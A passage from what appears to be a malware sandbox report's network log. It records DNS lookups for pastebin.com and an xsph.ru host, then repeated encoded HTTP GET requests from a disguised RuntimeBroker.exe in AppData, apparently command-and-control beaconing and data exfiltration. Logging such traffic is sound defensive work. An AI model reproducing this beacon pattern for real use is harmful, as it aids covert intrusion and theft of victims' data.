Jan 3, 2025 00:29:27.441503048 CET	80	50024	141.8.192.151	192.168.2.4
Jan 3, 2025 00:29:27.441622019 CET	50024	80	192.168.2.4	141.8.192.151

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 00:27:11.004736900 CET	53078	53	192.168.2.4	1.1.1.1
Jan 3, 2025 00:27:11.011827946 CET	53	53078	1.1.1.1	192.168.2.4
Jan 3, 2025 00:27:12.933711052 CET	64010	53	192.168.2.4	1.1.1.1
Jan 3, 2025 00:27:12.980257034 CET	53	64010	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 00:27:11.004736900 CET	192.168.2.4	1.1.1.1	0xa3d	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:27:12.933711052 CET	192.168.2.4	1.1.1.1	0x7595	Standard query (0)	f1070307.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 00:27:11.011827946 CET	1.1.1.1	192.168.2.4	0xa3d	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:27:11.011827946 CET	1.1.1.1	192.168.2.4	0xa3d	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:27:11.011827946 CET	1.1.1.1	192.168.2.4	0xa3d	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Jan 3, 2025 00:27:12.980257034 CET	1.1.1.1	192.168.2.4	0x7595	No error (0)	f1070307.xsph.ru	141.8.192.151	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

f1070307.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:12.987802982 CET	440	OUT	GET /3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:27:13.768255949 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 4a 53 59 35 59 44 4d 69 68 54 59 77 51 47 4f 31 55 54 4f 6a 52 32 4d 35 49 7a 4e 6c 64 6a 4e 6d 4e 44 5a 68 4e 7a 4e 34 6b 44 4d 79 49 69 4f 69 51 7a 4e 30 49 7a 4e 31 51 54 4f 33 4d 44 5a 6b 56 7a 4d 78 59 6d 5a 34 49 47 4f 77 6b 44 4e 77 67 6a 59 78 55 44 4d 6c 46 7a 4e 69 77 69 49 6d 46 31 62 33 39 55 61 4b 6c 6e 57 59 4a 56 65 61 68 6c 57 31 4a 47 4d 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 32 54 46 70 56 56 57 5a 56 4f 7a 4a 6d 4d 4b 52 58 5a 57 35 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 69 64 55 4f 70 4a 47 57 73 52 56 5a 58 35 55 64 61 68 6c 53 35 52 32 56 4f 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 4a 6c 52 4f 5a 56 53 71 39 57 61 61 64 6c 55 32 46 31 4d 73 70 6d 59 74 5a 56 65 6a 35 6d 56 71 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 [TRUNCATED] Data Ascii: 9JSY5YDMihTYwQGO1UTOjR2M5IzNldjNmNDZhNzN4kDMyIiOiQzN0IzN1QTO3MDZkVzMxYmZ4IGOwkDNwgjYxUDMlFzNiwiImF1b39UaKlnWYJVeahlW1JGMOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavl2TFpVVWZVOzJmMKRXZW5UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaidUOpJGWsRVZX5UdahlS5R2VOZmYtxmbkdFe3JmMW5WSpF0ZDl2dpJlROZVSq9WaadlU2F1MspmYtZVej5mVqhlM1AnWzY1cjdUOspVeJdWSB92cJ1Gd5JWMsZGZyY1TMFDeollMslnWXFjQJp2bpp1V1YXZtZFdhhlUmJWbs5GZXh3diJjVulUaBd2QpdXaNRUSp9UaKpHZXx2aZZlS1klMGlHZX5kaRdVN2FGWShWWykzcYJTNwp1MWN3YHlDbalXSnlUQvNXSqdmMNRUQ15ERjRXSq9WaadlUxQ2Rs5mYtlzcYJTNwp1MWN3YHlDbalXSnlUQvNXSq1UeNR1Y11ERRl2TppEbahkVwEGWShmYGlTdhdFZxIGSCZnWXNWaJNUQLx0QKhWWywWeadVMCl0RoBzYtlzTJp2bpp1VxgGVuJVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QKJEVplkNJ1mVrJGMOBjYtZVdhhlU1JmMOZmYtxmbkdFe3JmMW5WSpF0ZDlGesNmM4hmWq9WaahlUoNGbSJkVuZFbYJTNwp1MWN3YHlDbalXSnlUQvNXTE9WaWVlV1FmV5UXYXRWMihkQ2p1VjlWSDF0SMNkS6pFWShGZG10ZadkVwE2V1YVSq9WaadVMoRlbslHZHVTMiJjTmJWbs5GZXh3diJjVulUaBd2QpdXaVFTVp9UaKxmWHlDRlhlSwImbWZXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJhXTEVVaPlmS [TRUNCATED]
Jan 3, 2025 00:27:13.768282890 CET	224	IN	Data Raw: 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 59 58 52 Data Ascii: plkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2Q
Jan 3, 2025 00:27:13.899174929 CET	880	IN	Data Raw: 70 64 58 61 68 4e 6a 53 32 64 31 55 43 4e 6a 57 56 52 54 61 50 6c 6d 53 31 51 32 52 73 70 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 61 30 73 53 57 54 6c 7a 59 51 64 55 4d 32 6c 56 65 31 73 6d 59 74 78 Data Ascii: pdXahNjS2d1UCNjWVRTaPlmS1Q2RspGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUa0sSWTlzYQdUM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHd2KKJTM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHdmbQdlWsNWbndWWUd3ZidVO5pVaCxmYHpEaidEboRWbFdGTHJVdhVVM0kVVwcWZXl0ZadkVwk1VWlXW5JE
Jan 3, 2025 00:27:13.968220949 CET	761	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:14.182140112 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 33 51 57 4f 7a 49 57 5a 32 55 7a 59 68 5a 32 4d 79 67 7a 59 6b 5a 32 4e 68 4e 44 4d 32 45 54 59 6d 5a 6a 4d 6d 6c 54 4f 34 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6IiZ3QWOzIWZ2UzYhZ2MygzYkZ2NhNDM2ETYmZjMmlTO4Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye
Jan 3, 2025 00:27:14.190882921 CET	812	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkVTZiVTNhJzM1ETN3M2NzEWNkdjNmJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:14.402713060 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jan 3, 2025 00:27:14.404134035 CET	1415	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JSOKl2Ysp0MiNnQIVmR4ZEW6R2MitWNXFGW4ZEWwolMipXOtNmasdFVjhnRihmTyIWT4ZEWoJFWZVkQINmQ4ZEW6ZVbiZHcHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkV [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:14.771512985 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:14.174628019 CET	2213	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjM [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:14.849374056 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:16.014965057 CET	785	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:27:16.712882996 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4d 7a 67 54 59 31 67 54 4e 79 4d 44 4d 79 45 6d 5a 6b 5a 44 4e 6d 46 6a 5a 7a 59 57 4e 6b 52 47 4e 78 55 54 4e 6a 68 7a 4e 34 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ISMzgTY1gTNyMDMyEmZkZDNmFjZzYWNkRGNxUTNjhzN4Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:19.994556904 CET	2321	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIwglZphjaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjU [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:20.679707050 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:24.797983885 CET	836	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:27:25.482902050 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jan 3, 2025 00:27:25.495332956 CET	1471	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JyZUZTUYp1c4dVWYJUeiBjQYVWeOVUS6Z0RTtEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiIzYhVDN3YDZxM2NwE [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:25.861948013 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jan 3, 2025 00:27:26.435018063 CET	3887	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUm